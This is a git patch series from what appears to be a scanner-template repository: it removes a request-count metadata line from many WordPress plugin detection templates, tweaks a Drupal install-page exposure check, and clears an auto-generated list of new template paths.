tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 2c7b16cb44..85aaf7ff16 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: - max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 9d6afa8d3f..0af322b728 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: - max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 87721a245a..d4ac0d179e 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: - max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 45e0dead0e..dbbadf3cfc 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: - max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index abec174ec3..401b0e479f 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: - max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index e088ac07a6..6f95506748 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: - max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 8b163200bf..4404f87aab 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: - max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 2366a7dad7..8995434fce 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: - max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 71448e61e8..8175806cb8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: - max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 717554b89f..db82bc7f43 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: - max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index fba5c8b09c..03ddae57bc 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: - max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 631202198e..d6449bb5bf 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: - max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index cc953078eb..2d5fdf1779 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: - max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 97ce674116..6b5705e20d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: - max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index 6d05a6f058..dbcdb64bad 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index baf5af3bb5..fb9ea502ce 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index aa1898c4ba..48ffb25245 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 5fae796fdd..4fa6fc3ffe 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 22f812e2b8..1c1c690fcd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: - max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index c637006d26..4d6702d81a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: - max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index e020507ccb..42cb8bc409 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: - max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index c92903fd79..55d6effbf5 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: - max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index c25b2c1c48..6786cab703 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: - max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 4d6dd14d25..784ba22c8a 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: - max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 7ca0870ed6..72ff55e58a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: - max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 4f0d9be568..8cfaa0f5a9 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: - max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index f3c481b824..85900a01a7 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: - max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index ba214fd7ea..a7ccde0b49 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: - max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 8f5fe8d9a5..422664a98c 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: - max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 0458b13354..f0af3a748a 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: - max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index d570be07bf..f89f1a20b3 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: - max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index ee05e3add8..01fb12d0ad 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: - max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index df2487955f..1773857e15 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: - max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 79ff01211c..bcd1509c68 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: - max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 23414b3d1d..c6aca20a60 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: - max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index fba45020e4..56dfdf4a59 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reviews-plugin-for-google/ metadata: - max-request: 1 plugin_namespace: wp-reviews-plugin-for-google wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 0178c8e9fb..810fc82cde 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: - max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a04ddc6003..783d381ed8 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: - max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 2ead906817..8bdc600063 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: - max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index dedd2e23b6..ab61cc0338 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: - max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 03cd7137a8..5f6fbc1f75 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: - max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index a68d4b7d78..d67150d038 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: - max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index bf9dfc3ad8..beeba7ca69 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: - max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 47911a86a5..c225df7bfd 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: - max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 1c25b6f488..aaad04cb76 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: - max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index b36317acd8..ff750a7d2a 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: - max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 5eb35dd17e..f1e7595ccd 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: - max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index ceb2b8d600..4b2769ee46 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: - max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From 7f49775ec667abd46481759cff0205fed4b03f05 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 12 Sep 2023 10:58:43 +0530 Subject: [PATCH 0290/1090] Update drupal-install.yaml --- http/exposures/files/drupal-install.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposures/files/drupal-install.yaml b/http/exposures/files/drupal-install.yaml index 7f0c3537f6..b2faa6cbbe 100644 --- a/http/exposures/files/drupal-install.yaml +++ b/http/exposures/files/drupal-install.yaml @@ -15,6 +15,7 @@ http: - "{{BaseURL}}/install.php?profile=default" - "{{BaseURL}}/core/install.php" + stop-at-first-match: true host-redirects: true max-redirects: 1 matchers: From b09ee896588fe5645049e7b58438709a8a240422 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 12 Sep 2023 05:32:42 +0000 Subject: [PATCH 0291/1090] Auto Generated New Template Addition List [Tue Sep 12 05:32:41 UTC 2023] :robot: --- .new-additions | 54 -------------------------------------------------- 1 file changed, 54 deletions(-) diff --git a/.new-additions b/.new-additions index 116651de89..e69de29bb2 100644 --- a/.new-additions +++ b/.new-additions @@ -1,54 +0,0 @@ -http/cnvd/2021/CNVD-2021-32799.yaml -http/cves/2016/CVE-2016-10108.yaml -http/cves/2018/CVE-2018-15917.yaml -http/cves/2018/CVE-2018-17153.yaml -http/cves/2020/CVE-2020-10220.yaml -http/cves/2020/CVE-2020-11798.yaml -http/cves/2021/CVE-2021-46107.yaml -http/cves/2022/CVE-2022-22897.yaml -http/cves/2023/CVE-2023-20073.yaml -http/cves/2023/CVE-2023-26469.yaml -http/cves/2023/CVE-2023-2648.yaml -http/cves/2023/CVE-2023-27034.yaml -http/cves/2023/CVE-2023-30150.yaml -http/cves/2023/CVE-2023-32563.yaml -http/cves/2023/CVE-2023-34124.yaml -http/cves/2023/CVE-2023-34192.yaml -http/cves/2023/CVE-2023-36844.yaml -http/cves/2023/CVE-2023-38433.yaml -http/cves/2023/CVE-2023-39361.yaml -http/cves/2023/CVE-2023-39598.yaml -http/cves/2023/CVE-2023-39600.yaml -http/cves/2023/CVE-2023-4634.yaml -http/exposed-panels/aspcms-backend-panel.yaml -http/exposed-panels/dxplanning-panel.yaml -http/exposed-panels/greenbone-panel.yaml -http/exposed-panels/jorani-panel.yaml -http/exposed-panels/snapcomms-panel.yaml -http/exposures/apis/seafile-api.yaml -http/exposures/files/bun-lock.yaml -http/miscellaneous/external-service-interaction.yaml -http/miscellaneous/rdap-whois.yaml -http/misconfiguration/ecology-info-leak.yaml -http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml -http/misconfiguration/missing-sri.yaml -http/misconfiguration/nacos/nacos-create-user.yaml -http/misconfiguration/php-debugbar-exposure.yaml -http/osint/gist.yaml -http/takeovers/lemlist-takeover.yaml -http/technologies/burp-collaborator-detect.yaml -http/technologies/honeypot-detect.yaml -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml -http/technologies/wordpress/plugins/wp-seopress.yaml -http/token-spray/api-notolytix.yaml -http/vulnerabilities/hikvision/hikvision-fastjson-rce.yaml -http/vulnerabilities/hikvision/hikvision-ivms-file-upload-bypass.yaml -http/vulnerabilities/jorani/jorani-benjamin-xss.yaml -http/vulnerabilities/other/huatian-oa8000-sqli.yaml -http/vulnerabilities/other/kingdee-erp-rce.yaml -http/vulnerabilities/other/landray-oa-datajson-rce.yaml -http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml 